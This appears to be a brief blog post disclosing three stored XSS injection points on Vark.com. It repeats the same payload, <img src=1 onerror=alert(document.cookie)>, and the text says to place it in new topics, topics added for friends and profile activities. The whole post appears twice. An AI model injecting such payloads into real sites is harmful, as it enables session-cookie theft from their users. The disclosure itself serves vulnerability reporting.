Vark.com has been lately acquired by google.
this xss seems to be useless (theorically harmless).
just add for a new topic
<img src=1 onerror=alert(document.cookie)>
-------------
For the second XSS
do the same
<img src=1 onerror=alert(document.cookie)>
adding a topic to one of your friends
---------------------------------
For the third XSS add the XSS payload
<img src=1 onerror=alert(document.cookie)>
in the activities of your profile and when vark.com will load them (after registration, in the share area)
you will see it working.
This will work only one time.
-----------
All those XSSs are useless in theory.
this xss seems to be useless (theorically harmless).
just add for a new topic
<img src=1 onerror=alert(document.cookie)>
-------------
For the second XSS
do the same
<img src=1 onerror=alert(document.cookie)>
adding a topic to one of your friends
---------------------------------
For the third XSS add the XSS payload
<img src=1 onerror=alert(document.cookie)>
in the activities of your profile and when vark.com will load them (after registration, in the share area)
you will see it working.
This will work only one time.
-----------
All those XSSs are useless in theory.
Comments
Post a Comment